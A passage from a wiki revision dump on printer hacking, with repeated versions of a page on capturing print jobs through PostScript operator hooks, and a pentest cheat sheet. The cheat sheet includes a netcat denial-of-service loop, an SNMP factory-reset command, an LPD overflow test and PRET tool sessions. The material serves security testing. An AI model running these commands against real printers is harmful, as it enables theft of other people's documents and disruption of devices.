ch. 10-2</ref> as shown below: @PJL SET HOLD=ON [actual data to be printed follows] Hold jobs are kept in memory and can be reprinted from the printer's control panel. This feature is supported by various printers, however as it seems only some Epson devices allow permanent job retention beeing set using <code>@PJL DEFAULT HOLD=ON</code>. '''How to test for this attack?''' Use [[PRET]]'s ''hold'' command in ''pjl'' mode and to check if permanent job retention can be set: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hold Setting job retention, reconnecting to see if still enabled Retention for future print jobs: OFF '''Who can perform this attack?''' This feature can only be exploited by a physical/local attacker to reprint stored jobs. === PostScript === PostScript offers similar functionality which however is model- and vendor-specific. For the HP LaserJet 4k series and various Kyocera printers, job retention can be enabled by prepending the following commands to a PostScript document: <syntaxhighlight lang=postscript> << /Collate true /CollateDetails << /Hold 1 /Type 8 >> >> setpagedevice </syntaxhighlight> While it is theoretically possible to permanently enable PostScript job retention using the [[PostScript#Security_features|startjob]] operator, this setting is explicitly reset by ''CUPS'' at the beginning of each print job using <code><< /Collate false >> setpagedevice</code>. To counter this protection mechanism however, the attacker can permanently redefine the <code>setpagedevice</code> operator to have no effect at all. '''How to test for this attack?''' Use [[PRET]]'s ''hold'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hold Job retention enabled. '''Who can perform this attack?''' This feature can only be exploited by a physical/local attacker to reprint stored jobs. == Job Capture == It is possible but uncommon to activate job retention in the printing dialog as discussed above. With PostScript however, one has complete access over the current print job and with the [[PostScript#Security_features|startjob]] operator, it is even possible to break out of the server loop and access future jobs. Such functionality has the potential to capture all documents if PostScript is used as a printer driver. === PostScript === With the capability to hook into arbitrary PostScript operators it is possible to manipulate and access foreign print jobs. To parse the actual datastream send to the printer, one can apply a pretty cool feature of the PostScript language: to read its own program code as data using the ''currentfile'' operator. This way, the whole datastream to be processed by the PostScript interpreter can be accessed by reading and stored to a file on the printer device. If the printer does not offer [[file system access]], captured documents can be stored in memory, for example within permanent PostScript dictionaries. One practical problem is to decide which operator should be hooked as one does not gain access to the datastream until this operator is processed by the PostScript interpreter. As an attacker wants to capture print jobs from the very beginning, the redefined operator must be the very first operator contained in the PostScript document. Fortunately all documents printed with CUPS are pressed into a fixed structure beginning with <code>currentfile /ASCII85Decode filter /LZWDecode filter cvx exec</code>. Based on the assumption of such a fixed structure, the attacker can capture documents from the beginning and execute (aka print) the file afterwards. For printing systems other than CUPS this attack should also be possible, but operators need to be adapted. Note that the PostScript header which usually includes media size, user and job names cannot be captured using this method because we first hook into at the beginning of the actual document. Another generic strategy to hook into at the beginning of every print job is to set the ''BeginPage'' system parameter, if supported by the printer (most printer do). This vulnerability has presumably been present in printing devices for decades as solely language constructs defined by the PostScript standard are abused. '''How to test for this attack?''' Use [[PRET]]'s ''capture'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> capture Print job operations: capture <operation> capture start - Record future print jobs. capture stop - End capturing print jobs. capture list - Show captured print jobs. capture fetch - Save captured print jobs. capture print - Reprint saved print jobs. printer:/> capture start Future print jobs will be captured in memory! printer:/> exit Now, print arbitrary documents (make sure PRET is disconnected to not block the printing channel). Afterwards, you can list, fetch or reprint captured documents: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> capture list Free virtual memory: 16.6M | Limit to capture: 5.0M date size user jobname creator ─────────────────────────────────────────────────────────────────────────────── Jan 25 18:38 3.1M - - - Jan 25 18:40 170K - - - printer:/> capture fetch Receiving capture/printer/690782792 3239748 bytes received. Receiving capture/printer/690646210 174037 bytes received. printer:/> capture print printing... printing... 2 jobs reprinted printer:/> capture stop Stopping job capture, deleting recorded jobs '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. af4cd691bd2b187fcbe1ebe8129607e6cd14e5b5 288 231 2017-01-28T18:54:04Z 134.147.24.11 0 wikitext text/x-wiki The most valuable data found on printers is print jobs themselves. Even in a digital world, important documents are printed and kept as hard copies. In high security environments with encrypted hard disks and network traffic, printers might be the weakest link in the security chain. However, even with access to the file system of a printer device an attacker cannot retrieve print jobs unless they have explicitly been stored. This is because print jobs are processed on-the-fly in memory only and never touch the hard disk. This article discusses legitimate print job retention features and methods to actively capture documents to being printed. == Job Retention == Some printers have stored print jobs accessible from the web server (for example, the ''HP DesignJet Z6100ps''). Usually however, job retention must be explicitly activated for a certain print job which can be done using standard PJL commands or proprietary PostScript code. Jobs are then kept in memory and can be reprinted from the control panel. === PJL === Legitimate job retention can be enabled for the current document by setting the PJL ''HOLD'' variable <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 10-2</ref> as shown below: @PJL SET HOLD=ON [actual data to be printed follows] Hold jobs are kept in memory and can be reprinted from the printer's control panel. This feature is supported by various printers, however as it seems only some Epson devices allow permanent job retention beeing set using <code>@PJL DEFAULT HOLD=ON</code>. '''How to test for this attack?''' Use [[PRET]]'s ''hold'' command in ''pjl'' mode and to check if permanent job retention can be set: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hold Setting job retention, reconnecting to see if still enabled Retention for future print jobs: OFF '''Who can perform this attack?''' This feature can only be exploited by a physical/local attacker to reprint stored jobs. === PostScript === PostScript offers similar functionality which however is model- and vendor-specific. For the HP LaserJet 4k series and various Kyocera printers, job retention can be enabled by prepending the following commands to a PostScript document: <syntaxhighlight lang=postscript> << /Collate true /CollateDetails << /Hold 1 /Type 8 >> >> setpagedevice </syntaxhighlight> While it is theoretically possible to permanently enable PostScript job retention using the [[PostScript#Security_features|startjob]] operator, this setting is explicitly reset by ''CUPS'' at the beginning of each print job using <code><< /Collate false >> setpagedevice</code>. To counter this protection mechanism however, the attacker can permanently redefine the <code>setpagedevice</code> operator to have no effect at all. '''How to test for this attack?''' Use [[PRET]]'s ''hold'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hold Job retention enabled. '''Who can perform this attack?''' This feature can only be exploited by a physical/local attacker to reprint stored jobs. == Job Capture == It is possible but uncommon to activate job retention in the printing dialog as discussed above. With PostScript however, one has complete access over the current print job and with the [[PostScript#Security_features|startjob]] operator, it is even possible to break out of the server loop and access future jobs. Such functionality has the potential to capture all documents if PostScript is used as a printer driver. === PostScript === With the capability to hook into arbitrary PostScript operators it is possible to manipulate and access foreign print jobs. To parse the actual datastream send to the printer, one can apply a pretty cool feature of the PostScript language: to read its own program code as data using the ''currentfile'' operator. This way, the whole datastream to be processed by the PostScript interpreter can be accessed by reading and stored to a file on the printer device. If the printer does not offer [[file system access]], captured documents can be stored in memory, for example within permanent PostScript dictionaries. One practical problem is to decide which operator should be hooked as one does not gain access to the datastream until this operator is processed by the PostScript interpreter. As an attacker wants to capture print jobs from the very beginning, the redefined operator must be the very first operator contained in the PostScript document. Fortunately all documents printed with CUPS are pressed into a fixed structure beginning with <code>currentfile /ASCII85Decode filter /LZWDecode filter cvx exec</code>. Based on the assumption of such a fixed structure, the attacker can capture documents from the beginning and execute (aka print) the file afterwards. For printing systems other than CUPS this attack should also be possible, but operators need to be adapted. Note that the PostScript header which usually includes media size, user and job names cannot be captured using this method because we first hook into at the beginning of the actual document. Another possibility may be ''BeginPage'' if supported by the printer. This vulnerability has presumably been present in printing devices for decades as solely language constructs defined by the PostScript standard are abused. '''How to test for this attack?''' Use [[PRET]]'s ''capture'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> capture Print job operations: capture <operation> capture start - Record future print jobs. capture stop - End capturing print jobs. capture list - Show captured print jobs. capture fetch - Save captured print jobs. capture print - Reprint saved print jobs. printer:/> capture start Future print jobs will be captured in memory! printer:/> exit Now, print arbitrary documents (make sure PRET is disconnected to not block the printing channel). Afterwards, you can list, fetch or reprint captured documents: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> capture list Free virtual memory: 16.6M | Limit to capture: 5.0M date size user jobname creator ─────────────────────────────────────────────────────────────────────────────── Jan 25 18:38 3.1M - - - Jan 25 18:40 170K - - - printer:/> capture fetch Receiving capture/printer/690782792 3239748 bytes received. Receiving capture/printer/690646210 174037 bytes received. printer:/> capture print printing... printing... 2 jobs reprinted printer:/> capture stop Stopping job capture, deleting recorded jobs '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 32722ea008b6475a2e845ff8fe889612fab2ed3e 231 2017-01-26T16:25:39Z Admin 1 Created page with "The most valuable data found on printers is print jobs themselves. Even in a digital world, important documents are printed and kept as hard copies. In high security environme..." wikitext text/x-wiki The most valuable data found on printers is print jobs themselves. Even in a digital world, important documents are printed and kept as hard copies. In high security environments with encrypted hard disks and network traffic, printers might be the weakest link in the security chain. However, even with access to the file system of a printer device an attacker cannot retrieve print jobs unless they have explicitly been stored. This is because print jobs are processed on-the-fly in memory only and never touch the hard disk. This article discusses legitimate print job retention features and methods to actively capture documents to being printed. == Job Retention == Some printers have stored print jobs accessible from the web server (for example, the ''HP DesignJet Z6100ps''). Usually however, job retention must be explicitly activated for a certain print job which can be done using standard PJL commands or proprietary PostScript code. Jobs are then kept in memory and can be reprinted from the control panel. === PJL === Legitimate job retention can be enabled for the current document by setting the PJL ''HOLD'' variable <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 10-2</ref> as shown below: @PJL SET HOLD=ON [actual data to be printed follows] Hold jobs are kept in memory and can be reprinted from the printer's control panel. This feature is supported by various printers, however as it seems only some Epson devices allow permanent job retention beeing set using <code>@PJL DEFAULT HOLD=ON</code>. '''How to test for this attack?''' Use [[PRET]]'s ''hold'' command in ''pjl'' mode and to check if permanent job retention can be set: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hold Setting job retention, reconnecting to see if still enabled Retention for future print jobs: OFF '''Who can perform this attack?''' This feature can only be exploited by a physical/local attacker to reprint stored jobs. === PostScript === PostScript offers similar functionality which however is model- and vendor-specific. For the HP LaserJet 4k series and various Kyocera printers, job retention can be enabled by prepending the following commands to a PostScript document: <syntaxhighlight lang=postscript> << /Collate true /CollateDetails << /Hold 1 /Type 8 >> >> setpagedevice </syntaxhighlight> While it is theoretically possible to permanently enable PostScript job retention using the [[PostScript#Security_features|startjob]] operator, this setting is explicitly reset by ''CUPS'' at the beginning of each print job using <code><< /Collate false >> setpagedevice</code>. To counter this protection mechanism however, the attacker can permanently redefine the <code>setpagedevice</code> operator to have no effect at all. '''How to test for this attack?''' Use [[PRET]]'s ''hold'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> hold Job retention enabled. '''Who can perform this attack?''' This feature can only be exploited by a physical/local attacker to reprint stored jobs. == Job Capture == It is possible but uncommon to activate job retention in the printing dialog as discussed above. With PostScript however, one has complete access over the current print job and with the [[PostScript#Security_features|startjob]] operator, it is even possible to break out of the server loop and access future jobs. Such functionality has the potential to capture all documents if PostScript is used as a printer driver. === PostScript === With the capability to hook into arbitrary PostScript operators it is possible to manipulate and access foreign print jobs. To parse the actual datastream send to the printer, one can apply a pretty cool feature of the PostScript language: to read its own program code as data using the ''currentfile'' operator. This way, the whole datastream to be processed by the PostScript interpreter can be accessed by reading and stored to a file on the printer device. If the printer does not offer [[file system access]], captured documents can be stored in memory, for example within permanent PostScript dictionaries. One practical problem is to decide which operator should be hooked as one does not gain access to the datastream until this operator is processed by the PostScript interpreter. As an attacker wants to capture print jobs from the very beginning, the redefined operator must be the very first operator contained in the PostScript document. Fortunately all documents printed with CUPS are pressed into a fixed structure beginning with <code>currentfile /ASCII85Decode filter /LZWDecode filter cvx exec</code>. Based on the assumption of such a fixed structure, the attacker can capture documents from the beginning and execute (aka print) the file afterwards. For printing systems other than CUPS this attack should also be possible, but operators need to be adapted. Note that the PostScript header which usually includes media size, user and job names cannot be captured using this method because we first hook into at the beginning of the actual document. Another possibility may be ''BeginPage'' if supported by the printer. This vulnerability has presumably been present in printing devices for decades as solely language constructs defined by the PostScript standard are abused. '''How to test for this attack?''' Use [[PRET]]'s ''capture'' command in ''ps'' mode: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> capture Print job operations: capture <operation> capture start - Record future print jobs. capture stop - End capturing print jobs. capture list - Show captured print jobs. capture fetch - Save captured print jobs. capture print - Reprint saved print jobs. printer:/> capture start Future print jobs will be captured in memory! printer:/> exit Now, print arbitrary documents (make sure PRET is disconnected to not block the printing channel). Afterwards, you can list, fetch or reprint captured documents: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> capture list Free virtual memory: 16.6M | Limit to capture: 5.0M date size user jobname creator ─────────────────────────────────────────────────────────────────────────────── Jan 25 18:38 3.1M - - - Jan 25 18:40 170K - - - printer:/> capture fetch Receiving capture/printer/690782792 3239748 bytes received. Receiving capture/printer/690646210 174037 bytes received. printer:/> capture print printing... printing... 2 jobs reprinted printer:/> capture stop Stopping job capture, deleting recorded jobs '''Who can perform this attack?''' Anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. 5d6d2ec55dc2ea2682e1a227e348f916fdd2ebb7 0 45 637 285 2017-07-02T17:48:50Z Admin 1 wikitext text/x-wiki To systematically check for vulnerabilities in a printing device, first perform a generic network [http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html assessment] and check for printer-specifc web based information leaks using [[Praeda]]. Then, use the following cheat sheet to quickly find flaws in [[Fundamentals#Printer Control Languages|printer languages]] and [[Fundamentals#Network printing protocols|network protocols]]. {| class="wikitable" |- ! Category !! Attack !! Protocol !! Testing |- | rowspan="5" | [[Denial of service]] | [[Transmission channel]] || TCP || <code>while true; do nc printer 9100; done</code> |- | rowspan="2" | [[Document processing]] | [[PostScript|PS]] || [[PRET]] commands: <code>disable</code>, <code>hang</code> |- | [[PJL]] || [[PRET]] commands: <code>disable</code>, <code>offline</code> |- | rowspan="2" | [[Physical damage]] | [[PostScript|PS]] || [[PRET]] command: <code>destroy</code> |- | [[PJL]] || [[PRET]] command: <code>destroy</code> |- | rowspan="8" | [[Privilege escalation]] | rowspan="3" | [[Factory defaults]] | [[SNMP]] || <code>snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6</code> |- | [[PML]] || [[PRET]] command: <code>reset</code> |- | [[PostScript|PS]] || [[PRET]] command: <code>reset</code> |- | rowspan="4" | [[Accounting bypass]] | TCP || Connect to printer directly, bypassing the print server |- | [[IPP]] || Check if you can set a username without authentication |- | [[PostScript|PS]] || Check if PostScript code is preprocessed on print server |- | [[PJL]] || [[PRET]] command: <code>pagecount</code> |- | [[Fax and Scanner]] || multiple || Install printer driver and (ab)use fax/scan functionality |- | rowspan="2" | [[Print job access]] | [[Print job retention]] || [[PostScript|PS]] || [[PRET]] command: <code>capture</code> |- | [[Print job manipulation]] || [[PostScript|PS]] || [[PRET]] commands: <code>cross</code>, <code>overlay</code>, <code>replace</code> |- | rowspan="5" | [[Information disclosure]] | [[Memory access]] || [[PJL]] || [[PRET]] command: <code>nvram dump</code> |- | rowspan="2" | [[File system access]] | [[PostScript|PS]] || [[PRET]] commands: <code>fuzz</code>, <code>ls</code>, <code>get</code>, <code>put</code>, … |- | [[PJL]] || [[PRET]] commands: <code>fuzz</code>, <code>ls</code>, <code>get</code>, <code>put</code>, … |- | rowspan="2" | [[Credential disclosure]] | [[PostScript|PS]] || [[PRET]] commands: <code>lock</code>, <code>unlock</code> |- | [[PJL]] || [[PRET]] commands: <code>lock</code>, <code>unlock</code> |- | rowspan="4" | [[Code execution]] | rowspan="2" | [[Buffer overflows]] | [[PJL]] || [[PRET]] command: <code>flood</code> |- | [[LPD]] || <code>./lpdtest.py printer in "`python -c 'print "x"*3000'`"</code> |- | [[Firmware updates]] || [[PJL]] || Flip a bit, check if the modified firmware is still accepted |- | [[Software packages]] || multiple || Obtain an SDK and write your own proof-of-concept application |- |} 3b9e264c636152aff5ff0f8959679d2660c9987f 285 201 2017-01-28T17:27:31Z Admin 1 wikitext text/x-wiki To systematically check for vulnerabilities in a printing device, first perform a generic network [http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html assessment] and check for printer-specifc web based information leaks using [[Praeda]]. Then, use the following cheat sheet to quickly find flaws in [[Fundamentals#Printer Control Languages|printer languages]] and [[Fundamentals#Network printing protocols|network protocols]]. {| class="wikitable" |- ! Category !! Attack !! Protocol !! Testing |- | rowspan="5" | [[Denial of service]] | [[Transmission channel]] || TCP || <code>while true; do nc printer 9100; done</code> |- | rowspan="2" | [[Document processing]] | [[PostScript|PS]] || [[PRET]] commands: <code>disable</code>, <code>hang</code> |- | [[PJL]] || [[PRET]] commands: <code>disable</code>, <code>offline</code> |- | rowspan="2" | [[Physical damage]] | [[PostScript|PS]] || [[PRET]] command: <code>destroy</code> |- | [[PJL]] || [[PRET]] command: <code>destroy</code> |- | rowspan="8" | [[Privilege escalation]] | rowspan="3" | [[Factory defaults]] | [[SNMP]] || <code>snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6</code> |- | [[PML]] || [[PRET]] command: <code>reset</code> |- | [[PostScript|PS]] || [[PRET]] command: <code>reset</code> |- | rowspan="4" | [[Accounting bypass]] | TCP || Connect to printer directly, bypassing the print server |- | [[IPP]] || Check if you can set a username without authentication |- | [[PostScript|PS]] || Check if PostScript code is preprocessed on print server |- | [[PJL]] || [[PRET]] command: <code>pagecount</code> |- | [[Fax and Scanner]] || multiple || Install printer driver and (ab)use fax/scan functionality |- | rowspan="2" | [[Print job access]] | [[Print job retention]] || [[PostScript|PS]] || [[PRET]] command: <code>capture</code> |- | [[Print job manipulation]] || [[PostScript|PS]] || [[PRET]] commands: <code>cross</code>, <code>overlay</code>, <code>replace</code> |- | rowspan="5" | [[Information disclosure]] | [[Memory access]] || [[PJL]] || [[PRET]] command: <code>nvram dump</code> |- | rowspan="2" | [[File system access]] | [[PostScript|PS]] || [[PRET]] commands: <code>ls</code>, <code>get</code>, <code>put</code>, … |- | [[PJL]] || [[PRET]] commands: <code>ls</code>, <code>get</code>, <code>put</code>, … |- | rowspan="2" | [[Credential disclosure]] | [[PostScript|PS]] || [[PRET]] commands: <code>lock</code>, <code>unlock</code> |- | [[PJL]] || [[PRET]] commands: <code>lock</code>, <code>unlock</code> |- | rowspan="4" | [[Code execution]] | rowspan="2" | [[Buffer overflows]] | [[PJL]] || [[PRET]] command: <code>flood</code> |- | [[LPD]] || <code>./lpdtest.py printer in "`python -c 'print "x"*3000'`"</code> |- | [[Firmware updates]] || [[PJL]] || Flip a bit, check if the modified firmware is still accepted |- | [[Software packages]] || multiple || Obtain an SDK and write your own proof-of-concept application |- |} b2f5fdb3578f3ac8c9c5609e313e652457ad494c 201 200 2017-01-23T13:42:57Z Admin 1 wikitext text/x-wiki To systematically check for vulnerabilities in a printing device, first perform a generic network [http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html assessment] and check for printer-specifc web based information leaks using [[Praeda]]. Then, use the following cheat sheet to quickly find flaws in [[Fundamentals#Printer Control Languages|printer languages]] and [[Fundamentals#Network printing protocols|network protocols]]. {| class="wikitable" |- ! Category !! Attack !! Protocol !! Testing |- | rowspan="5" | [[Denial of service]] | [[Transmission channel]] || TCP || <code>while true; do nc printer 9100; done</code> |- | rowspan="2" | [[Document processing]] | [[PostScript|PS]] || [[PRET]] commands: <code>disable</code>, <code>hang</code> |- | [[PJL]] || [[PRET]] commands: <code>disable</code>, <code>offline</code> |- | rowspan="2" | [[Physical damage]] | [[PostScript|PS]] || [[PRET]] command: <code>destroy</code> |- | [[PJL]] || [[PRET]] command: <code>destroy</code> |- | rowspan="8" | [[Privilege escalation]] | rowspan="3" | [[Factory defaults]] | [[SNMP]] || <code>snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6</code> |- | [[PML]] || [[PRET]] command: <code>reset</code> |- | [[PostScript|PS]] || [[PRET]] command: <code>reset</code> |- | rowspan="4" | [[Accounting bypass]] | TCP || Connect to printer directly, bypassing the print server |- | [[IPP]] || Check if you can set a username without authentication |- | [[PostScript|PS]] || Check if PostScript code is preprocessed on print server |- | [[PJL]] || [[PRET]] command: <code>pagecount</code> |- | [[Fax and Scanner]] || multiple || Install printer driver and (ab)use fax/scan functionality |- | rowspan="2" | [[Print job access]] | [[Print job retention]] || [[PostScript|PS]] || [[PRET]] command: <code>capture</code> |- | [[Print job manipulation]] || [[PostScript|PS]] || [[PRET]] commands: <code>cross</code>, <code>overlay</code>, <code>replace</code> |- | rowspan="5" | [[Information disclosure]] | [[Memory access]] || [[PJL]] || [[PRET]] command: <code>nvram dump</code> |- | rowspan="2" | [[File system access]] | [[PostScript|PS]] || [[PRET]] commands: <code>ls</code>, <code>get</code>, <code>put</code>, … |- | [[PJL]] || [[PRET]] commands: <code>ls</code>, <code>get</code>, <code>put</code>, … |- | rowspan="2" | [[Credential disclosure]] | [[PostScript|PS]] || [[PRET]] commands: <code>lock</code>, <code>unlock</code> |- | [[PJL]] || [[PRET]] commands: <code>lock</code>, <code>unlock</code> |- | rowspan="4" | [[Code execution]] | rowspan="2" | [[Buffer overflows]] | [[PJL]] || [[PRET]] command: <code>flood</code> |- | [[LPD]] || <code>./lpdtest.py printer in "`python -c 'print "x"*3000'`"</code> |- | [[Firmware updates]] || [[PJL]] || Flip a bit, check if the modified firmware is still accepted |- | [[Software packages]] || multiple || Obtain an SDK and write your own proof-of-concept application |- |} b28c60a5424d358c83ce1549f6d10005fb198159 200 2017-01-23T13:33:14Z Admin 1 Created page with "{| class="wikitable" |- ! Category !! Attack !! Protocol !! Testing |- | rowspan="5" | [[Denial of service]] | [[Transmission channel]] || TCP || <code>while true; do nc pr..." wikitext text/x-wiki {| class="wikitable" |- ! Category !! Attack !! Protocol !! Testing |- | rowspan="5" | [[Denial of service]] | [[Transmission channel]] || TCP || <code>while true; do nc printer 9100; done</code> |- | rowspan="2" | [[Document processing]] | [[PostScript|PS]] || [[PRET]] commands: <code>disable</code>, <code>hang</code> |- | [[PJL]] || [[PRET]] commands: <code>disable</code>, <code>offline</code> |- | rowspan="2" | [[Physical damage]] | [[PostScript|PS]] || [[PRET]] command: <code>destroy</code> |- | [[PJL]] || [[PRET]] command: <code>destroy</code> |- | rowspan="8" | [[Privilege escalation]] | rowspan="3" | [[Factory defaults]] | [[SNMP]] || <code>snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6</code> |- | [[PML]] || [[PRET]] command: <code>reset</code> |- | [[PostScript|PS]] || [[PRET]] command: <code>reset</code> |- | rowspan="4" | [[Accounting bypass]] | TCP || Connect to printer directly, bypassing the print server |- | [[IPP]] || Check if you can set a username without authentication |- | [[PostScript|PS]] || Check if PostScript code is preprocessed on print server |- | [[PJL]] || [[PRET]] command: <code>pagecount</code> |- | [[Fax and Scanner]] || multiple || Install printer driver and (ab)use fax/scan functionality |- | rowspan="2" | [[Print job access]] | [[Print job retention]] || [[PostScript|PS]] || [[PRET]] command: <code>capture</code> |- | [[Print job manipulation]] || [[PostScript|PS]] || [[PRET]] commands: <code>cross</code>, <code>overlay</code>, <code>replace</code> |- | rowspan="5" | [[Information disclosure]] | [[Memory access]] || [[PJL]] || [[PRET]] command: <code>nvram dump</code> |- | rowspan="2" | [[File system access]] | [[PostScript|PS]] || [[PRET]] commands: <code>ls</code>, <code>get</code>, <code>put</code>, … |- | [[PJL]] || [[PRET]] commands: <code>ls</code>, <code>get</code>, <code>put</code>, … |- | rowspan="2" | [[Credential disclosure]] | [[PostScript|PS]] || [[PRET]] commands: <code>lock</code>, <code>unlock</code> |- | [[PJL]] || [[PRET]] commands: <code>lock</code>, <code>unlock</code> |- | rowspan="4" | [[Code execution]] | rowspan="2" | [[Buffer overflows]] | [[PJL]] || [[PRET]] command: <code>flood</code> |- | [[LPD]] || <code>./lpdtest.py printer in "`python -c 'print "x"*3000'`"</code> |- | [[Firmware updates]] || [[PJL]] || Flip a bit, check if the modified firmware is still accepted |- | [[Software packages]] || multiple || Obtain an SDK and write your own proof-of-concept application |- |} 3795a98ad471e6c041775ba989dde9c566074750 0 36 157 156 2017-01-15T17:13:04Z 92.227.58.56 0 wikitext text/x-wiki This category of attacks lists methods which can be used to bypass protection mechanisms or to extend the capabilities of an attacker. ''Currently, the following privilege escalation techniques are discussed in this wiki:'' * [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by the user * [[Accounting bypass]] – Breaking accounting and authentication in print servers (free copies!) * [[Fax and Scanner]] – Extending the attackers capabilities (access to phone lines through MFPs!) 9e9e5df7d4d2e4ecb65e0c2d3724ce547f07f2c7 156 155 2017-01-15T17:10:02Z 92.227.58.56 0 wikitext text/x-wiki This category of attacks lists methods which can be used to bypass protection mechanisms or to extend the capabilities of an attacker. ''Currently, the following privilege escalation techniques are discussed in this wiki:'' * [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by the user * [[Accounting bypass]] – Breaking accounting and authentication in print servers (free copies!) * [[Fax and Scanner]] – Extending the attackers capabilities, e.g. to access phone lines via MFPs 0d535d2c40b0aec4905fc8277617d762ce60bf63 155 149 2017-01-15T17:09:47Z 92.227.58.56 0 wikitext text/x-wiki This category of attacks lists methods which can be used to bypass protection mechanisms or to extend the capabilities of and attacker. ''Currently, the following privilege escalation techniques are discussed in this wiki:'' * [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by the user * [[Accounting bypass]] – Breaking accounting and authentication in print servers (free copies!) * [[Fax and Scanner]] – Extending the attackers capabilities, e.g. to access phone lines via MFPs d73c11587c307e1561e5a46f61f8756e1efb1f2d 149 144 2017-01-15T16:35:31Z 92.227.58.56 0 wikitext text/x-wiki ''Currently, the following privilege escalation techniques are discussed in this wiki:'' * [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by the user * [[Accounting bypass]] – Breaking accounting and authentication in print servers (free copies!) * [[Fax and Scanner]] – Extending the attackers capabilities, e.g. to access phone lines via MFPs ced8cf1c4d8327ba75aec1a46f6474e5206c554e 144 2017-01-15T16:23:15Z 92.227.58.56 0 Created page with "''Currently, the following denial of service techniques are discussed in this wiki:'' * [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by t..." wikitext text/x-wiki ''Currently, the following denial of service techniques are discussed in this wiki:'' * [[Factory defaults]] – Resetting the device to bypass protection mechanisms set by the user * [[Accounting bypass]] – Breaking accounting and authentication in print servers (free copies!) * [[Fax and Scanner]] – Extending the attackers capabilities, e.g. to access phone lines via MFPs 0e13a456214f60a7f800285eea71a172af521212 0 27 80 2017-01-09T09:36:53Z Admin 1 Redirected page to [[Port 9100 printing]] wikitext text/x-wiki #REDIRECT [[Port 9100 printing]] 7b3f5240e9d53080ec6615f74fba18647b30038c 0 10 25 2016-12-22T16:56:04Z Admin 1 Created page with "'''PJL Reference''' * [http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual] '''PML Reference''' * [http://ftp.icm.edu.pl/packa..." wikitext text/x-wiki '''PJL Reference''' * [http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual] '''PML Reference''' * [http://ftp.icm.edu.pl/packages/lprng/RESOURCES/SNMPDesignJetpassthru.pdf PJL Passthrough to PML and SNMP – User’s Guide] '''PCL Reference''' * [http://www.hp.com/ctg/Manual/bpl13210.pdf PCL 5 Printer Language Technical Reference Manual] * [http://www.pclviewer.com/resources/reference/ PCL 5 Printer Command Language Reference] * [http://www.undocprint.org/_media/formats/page_description_languages/pcl5_quick_reference.pdf PCL 5 Technical Quick Reference Guide] * [https://support.necam.com/printers/pclcodes/pcl5hp.htm PCL 5 Control Codes and Escape Sequences] '''PostScript Links''' * [https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference, third edition (“Red Book”)] * [https://www-cdf.fnal.gov/offline/PostScript/BLUEBOOK.PDF PostScript Language Tutorial and Cookbook (“Blue Book”)] * [https://www-cdf.fnal.gov/offline/PostScript/GREENBK.PDF PostScript Language Program Design (“Green Book”)] * [http://w3-o.cs.hm.edu/~ruckert/compiler/ThinkingInPostScript.pdf Thinking in PostScript (Free Addison-Wesley Book)] * [https://atrey.karlin.mff.cuni.cz/~milanek/PostScript/Reference/REF.html PostScript Level 2 Lanugage Reference] * [https://en.wikibooks.org/wiki/PostScript_FAQ PostScript FAQ from Wikibooks] * [http://www.acumentraining.com/acumenjournal.html Acumen Journal and Resources] * [http://www.tinaja.com/post01.shtml Don Lancaster's PostScript Library] * [http://www.anastigmatix.net/postscript/ Anastigmatix PostScript Resources] '''Miscellaneous''' * [http://www.undocprint.org/ Undocumented Printing – Resource on Printing Protocols] 376f1663174713b9ef308d38ca7cfc1928bf402c 0 28 312 264 2017-01-31T08:29:45Z 84.153.135.37 0 wikitext text/x-wiki [[File:SMB-deployment-channel.png|thumb|180px|Printing over SMB]] Server Message Block (SMB) is an application-layer network protocol for file and printer sharing originally developed by IBM in the mid-80s. It is the default method used by Windows based computers to share files and printers <ref>''[https://technet.microsoft.com/en-us/library/cc939973.aspx Common Internet File System]'', Microsoft TechNet Library</ref>. A free implementation is available with the [https://en.wikipedia.org/wiki/Samba_%28software%29 Samba] project. Some network printers bring their own SMB server – usually running on port 445/tcp – which, just like to [[LPD]], [[IPP]] and [[raw]] port 9100 printing, can be abused as a carrier for malicious PostScript or PJL 